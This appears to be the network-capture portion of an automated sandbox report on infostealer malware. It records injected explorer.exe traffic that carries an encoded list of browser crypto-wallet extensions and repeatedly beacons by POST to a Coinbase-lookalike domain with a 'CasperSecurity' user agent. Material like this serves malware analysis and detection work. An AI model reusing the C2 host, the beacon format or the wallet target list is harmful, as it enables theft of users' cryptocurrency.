                                                                                                                                                                                                                                Data Ascii: ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkY
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497788906 CEST1236INData Raw: 72 00 61 00 32 00 46 00 69 00 62 00 6d 00 52 00 6a 00 62 00 6d 00 35 00 76 00 5a 00 32 00 46 00 6e 00 62 00 32 00 64 00 69 00 62 00 6d 00 56 00 6c 00 59 00 33 00 78 00 53 00 62 00 32 00 35 00 70 00 62 00 6c 00 64 00 68 00 62 00 47 00 78 00 6c 00
                                                                                                                                                                                                                                Data Ascii: ra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkc
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497798920 CEST1236INData Raw: 92 a7 07 f2 f0 f3 69 e2 a1 4e da f4 cd 65 05 be d5 06 34 62 1f d1 a6 fe 8a c4 2e 53 9d 34 f3 55 a0 a2 8a e1 32 05 f6 eb 75 a4 83 ec 39 0b 60 ef aa 40 71 9f 06 5e 6e 10 51 bd 21 8a f9 3e dd 06 3d 96 3e 05 ae dd e6 bd 46 4d 54 8d b5 91 c4 5d 05 71
                                                                                                                                                                                                                                Data Ascii: iNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=-9'6d\!h[T6.:$gWO awKiZ*"C<
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497808933 CEST1236INData Raw: 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 00 00 00 00 00 00 a5 c6 63 63 84 f8 7c 7c 99 ee 77 77 8d f6 7b 7b 0d ff f2 f2 bd d6 6b 6b b1 de 6f 6f 54 91 c5 c5 50 60 30 30 03 02 01 01 a9 ce 67 67 7d 56 2b 2b 19 e7 fe fe 62 b5 d7 d7 e6 4d ab ab
                                                                                                                                                                                                                                Data Ascii: sionId='cc||ww{{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~??O\h44Q4qqsSb11?*ReF##^(07
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497823000 CEST1236INData Raw: f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58 74 21 d3 49 e0 69 29 8e c9 c8 44 75 c2 89 6a f4 8e 79 78 99 58 3e 6b 27 b9 71 dd be e1 4f b6 f0 88 ad 17 c9 20 ac 66 7d ce 3a b4 63 df 4a 18 e5 1a 31 82
                                                                                                                                                                                                                                Data Ascii: Fk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\+yNie4b4.SU2u9@`^qnQ>!=
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497931957 CEST328INData Raw: 0e 07 12 36 24 12 80 9b 1b 80 e2 3d df e2 eb 26 cd eb 27 69 4e 27 b2 cd 7f b2 75 9f ea 75 09 1b 12 09 83 9e 1d 83 2c 74 58 2c 1a 2e 34 1a 1b 2d 36 1b 6e b2 dc 6e 5a ee b4 5a a0 fb 5b a0 52 f6 a4 52 3b 4d 76 3b d6 61 b7 d6 b3 ce 7d b3 29 7b 52 29
                                                                                                                                                                                                                                Data Ascii: 6$=&'iN'uu,tX,.4-6nnZZ[RR;Mv;a}){R)>/q^/SSh, `@ y[[jjFg9Kr9JJLLXXJk*OCCMM3Uf3EEPP<Dx<%KQQ]@@?
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497942924 CEST1236INData Raw: fc 7e 3d 47 7a 3d 64 ac c8 64 5d e7 ba 5d 19 2b 32 19 73 95 e6 73 60 a0 c0 60 81 98 19 81 4f d1 9e 4f dc 7f a3 dc 22 66 44 22 2a 7e 54 2a 90 ab 3b 90 88 83 0b 88 46 ca 8c 46 ee 29 c7 ee b8 d3 6b b8 14 3c 28 14 de 79 a7 de 5e e2 bc 5e 0b 1d 16 0b
                                                                                                                                                                                                                                Data Ascii: ~=Gz=dd]]+2ss``OO"fD"*~T*;FF)k<(y^^v;2Vd2:Nt:II$lH$\\]nCbb917yy2C7Yn7mmdNNIllVV%eezzGoxx%oJ%.r\.$8Ws
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497991085 CEST1236INData Raw: 6d 00 46 00 6c 00 62 00 47 00 31 00 76 00 62 00 57 00 56 00 70 00 62 00 57 00 68 00 73 00 63 00 47 00 31 00 6e 00 61 00 6d 00 35 00 71 00 62 00 33 00 42 00 6f 00 61 00 48 00 42 00 72 00 61 00 32 00 39 00 73 00 61 00 6e 00 42 00 68 00 66 00 46 00
                                                                                                                                                                                                                                Data Ascii: mFlbG1vbWVpbWhscG1nam5qb3BoaHBra29sanBhfFBoYW50b20KZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8T3h5Z2VuCm1nZmZrZmJpZGloanB
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.502677917 CEST1236INData Raw: 47 00 56 00 70 00 62 00 57 00 64 00 73 00 61 00 57 00 64 00 75 00 5a 00 47 00 52 00 72 00 61 00 6d 00 64 00 76 00 5a 00 6d 00 74 00 6a 00 59 00 6d 00 64 00 6c 00 61 00 32 00 68 00 6c 00 62 00 6d 00 4a 00 6f 00 66 00 45 00 39 00 34 00 65 00 57 00
                                                                                                                                                                                                                                Data Ascii: GVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.2.449766188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.055756092 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.063711882 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.785182953 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BCn%2FL6fGrYn8oV55qhT3jLr6GVZxy9gbW28f9zI8RXepnqPqeEZsa6qHqFgc2MU9zLeHiRsjwwMFl5UAwcfvPG3wMMLNnkbiYVIm2GxSoxKfcH9UexM3MpHq71dlo%2BlUFN5r5eGk0ban2A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ede5b574386-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.449769188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.898973942 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.903873920 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.769922972 CEST623INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:27 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KrcZVTa5YrXn5ACndPQFuRblwRxwvwvRd1HbvQrwHu5fH%2F9MtznfYa3To4Rbno8RMIhB5NjIQKpWYlu5wryPwaT%2BQJXd%2Fbh8q9oThVxOdqhaa%2BvYWXDdSs%2BB%2BGe4l9XYYoKWwNPM8mJcklo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ee3c99c8c4b-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.449770188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.885797977 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.890707016 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.597379923 CEST613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:28 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOKVBafCVW9DAW0%2FTQ3IOGdJICYXNhroTY3xUS2brQt6GiIA5r42PkXdp04baO8FTksFCt3kMdKJS7E7UsmpfEK7Wp0DKS4lQltsYc8lrQHrskE47fjDiaY7YIAi2BtwqOXYhZmTt8GOQXo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ee9df950cae-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.449772188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.711553097 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.716425896 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:29.420284986 CEST627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:29 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCsO3%2BcRCQamA5HMNmR5jjVlensKrcvQo4Ew0cR2e2hQ0VcPU9C9WA1F7zEQEKsj%2F%2F%2FLFKn6mhnsXthwLI521GDE1Zvhscj%2F8nztllQFyYHij9YZ%2FOcPspt3nJtJl1%2F35aGi0yMv%2BcEk4pA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3eef0ac87cfa-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.449773188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:29.539773941 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:29.544754982 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:30.287144899 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5S1Kj2XuMJ521rnheCfUnKqM6Qnq2x0Ka1cxmGRu8Rg9RJUWdpyHMSL9H4cqfOiLbOan3jCNbAmtYnh3p8kr%2BP8UEcg4sIUwi37UYN029wWmZiEV1ljPFuYMVbzI5oMfgaYg0Zww%2BS56Ps8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3ef46f4b41f3-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.449775188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:30.555666924 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:30.560511112 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:31.268838882 CEST617INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:31 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wZAkZ8AcDGP6%2BSxVMrnZOWqLVZKdh53ngvHfGBMNKHrQyRwVwvAWZQ6mX3Ddwcg9wzJyvtSiOndS1sipEefIV%2BpQeO5Ek0NvCxhyMY6iNup%2B9B3ZcBFr5c72HUxaTbHjeCSoJBuMG9rWjx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3efa7f507c7e-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.449778188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:31.385483027 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:31.391784906 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:32.114167929 CEST619INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:32 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ujearrVHUinMeSWCC2KYylz60gcYdSY52ok3TYNi%2FprMZIK6M1PDOM%2B%2B0yJqSQx9puGdJTcLP9XBgxxRs1Cf4TpkX5nQyqWEv5u99j%2FeU05z6s0k8SxrVsp1TEvIZI9117GJd0xbCScS34%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3effcfc51831-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.2.449781188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:32.392018080 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:32.399223089 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:33.134685040 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:33 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmGEHqEGREFo55RHuQ66nCdqanGKpm3pw4XfgogiS7gQ4%2Ft2TJMeppnCLesjpz2UHz%2B%2BzeWlKj5wDlY1Yql6Wtsia24AiIMHsB3e9GnYvY8gpShPwIM2tLl25Eim5f37gNrdUBWx%2BopICv4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f060faa7cf6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.449782188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:33.258668900 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:33.263577938 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:34.017215014 CEST621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:33 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hc%2BsnTlY4358Iuvj68gSY6J6%2FlYTwJTYKTJY20bI6q%2BaJVsTo%2BpdbcpVhui0TU%2FXjjHA66Tvbdjs75k9V5Vh0X3ArZwylUi0FV05inHFlyxkakksq2gR6iNqx8Kwgu8gfMhxV087OsYAB0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f0b684a42c6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                23192.168.2.449783188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:34.133469105 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:34.138387918 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:34.881057024 CEST615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:34 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHib%2Bu0YlKgK3bQFv5UindcB5YhIYmQNb9yrcEHKBSPIR6jyBzYPPG8M3wCHiwg4lOWLiIwWudf8Dqif4%2BXSxBUddzlF6ugC9D3TtHwbtIfIpMbRjleIbtj6RQuOkBCOsjtbv7YkjeC7UDY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f10f88b8c41-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                24192.168.2.449784188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:34.995620012 CEST192OUTPOST /api.php?{B955B2CC07A01546086603} HTTP/1.1
                                                                                                                                                                                                                                Host: auth.xn--conbase-sfb.xyz
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:35.000462055 CEST6OUTData Raw: 46 5a 57 56
                                                                                                                                                                                                                                Data Ascii: FZWV
                                                                                                                                                                                                                                Jul 6, 2024 13:27:36.742166996 CEST625INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:36 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=11ec6oRjdi2g9T%2F2LZzYvDioMBVnJsPbJgDmssUXFxNvB%2FDPNjCVpPNubOuU%2Bo%2FR8P%2BCTugd49NyJWZJzHSKVFK%2FfjTqQ7LnAGJu5%2B83GnwjYJYvNi46lYmz9eUVX9DfddtyHxCQ7RifCKk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 89ef3f1649094255-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
